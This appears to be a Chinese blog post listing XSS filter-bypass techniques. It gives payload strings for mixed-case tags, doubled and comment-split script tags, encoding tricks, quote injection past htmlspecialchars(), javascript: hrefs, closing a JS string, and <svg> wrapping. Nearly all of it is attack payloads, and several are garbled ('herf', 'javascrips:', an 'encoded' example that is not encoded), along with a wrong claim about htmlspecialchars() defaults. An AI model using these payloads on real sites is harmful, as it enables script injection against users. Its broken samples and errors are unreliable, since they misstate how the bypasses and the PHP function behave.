简介
目前,基本上所有的网站都会防止XSS攻击,会过滤XSS恶意代码。所以学会一定的绕过技巧必不可少。
详解
大小写混合绕过
payload:<sCRipT>alert('喝了两瓶')</sCrIPt>
双写绕过
payload:<sc<script>ript>alert('卡姐姐哦')</scr<script>ipt>
注释绕过
payload:<sc<!--test-->ript>alert('看见哈桑')</scr<!--tshauie-->ipt>
- 编码绕过
一次编码案例
#使用事件属性onerror()的原始payload: <img src=# onerror=alert('yangshuang')"/> #使用HTML_ENTITY编码后的payload: <a src=x onerror="alert('yangshuang')"/>
多次编码案例解析如下编码
#原始payload <a herf="javascrips:alert(XSS)"> </a> #使用unicode的UTF-16编码alert这个字符 <a herf="javascrips:\u0061\u006C\u0065\u0072\u0074(XSS)"> </a> #再用url编码alert的中间结果 <a herf="javascrips:%5Cu0061%5Cu006C%5Cu0065%5Cu0072%5Cu0074(XSS)"> </a> #最后用html实体编码,再编码整个payload 太长了,略
htmlspecialchars()函数绕过
htmlspecialchars()函数是一种常用的PHP函数,用于将特殊字符转换为HTML实体,以防止跨站脚本攻击(XSS)。#该函数的语法: htmlspecialchars(string,flags,character-set,double_encode) #可用的quotestyle类型: ENT_COMPAT - 默认,仅编码双引号 ENT_QUOTES - 编码双引号和单引号 ENT_NOQUOTES - 不编码任何引号 #预定义的字符是: & (和号) 成为 & " (双引号) 成为 " ’ (单引号) 成为 ' < (小于) 成为 < > (大于) 成为 >
过滤原理:htmlspecialchars() 函数把预定义的字符转换为 HTML 实体,从而使XSS攻击失效。但是这个函数默认配置不会将单引号和双引号过滤,只有设置了quotestyle规定如何编码单引号和双引号才能会过滤掉单引号
# 默认配置下,可使用以下语句绕过: q' onclick='alert(111)'
href伪协议绕过
当输入的值在 a 标签 herf 里payload:javascript:alert(1111)
直接代入 a 标签 herf 里面,一样可以绕过 htmlspecialchars()函数
js输出绕过
当目标是用JavaScript脚本输出的,只需闭合原有的表情即可插入代码<script> $ms=' 11111111'</script><script>alert(1111)</script> ;
标签绕过
当输入< script >alert(XSS);</ script >没有反应的时候
可以再前边加上< svg >,<svg><script>alert(XSS);</script>
当浏览器解析到< svg >标签时,浏览器就开始使用一套新的标准开始解析后面的内容,直到碰到闭合标签。而在这一套新的标准遵循XML解析规则,在XML中实体编码会自动转义,重新来一遍标签开启状态,此时就会执行xss了。
评论 (0)